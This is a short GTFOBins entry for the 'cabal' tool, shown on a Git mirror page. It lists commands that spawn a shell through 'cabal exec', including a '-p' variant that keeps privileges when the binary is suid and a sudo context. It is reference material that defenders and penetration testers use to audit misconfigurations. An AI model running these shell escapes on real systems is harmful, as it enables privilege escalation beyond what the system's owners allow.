1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-08 06:56:15 +01:00
GTFOBins.github.io/_gtfobins/cabal
2025-12-26 22:07:31 +01:00

14 lines
250 B
Plaintext

---
functions:
shell:
- code: |-
cabal exec --project-file=/dev/null -- /bin/sh
contexts:
sudo:
suid:
code: |-
cabal exec --project-file=/dev/null -- /bin/sh -p
shell: false
unprivileged:
...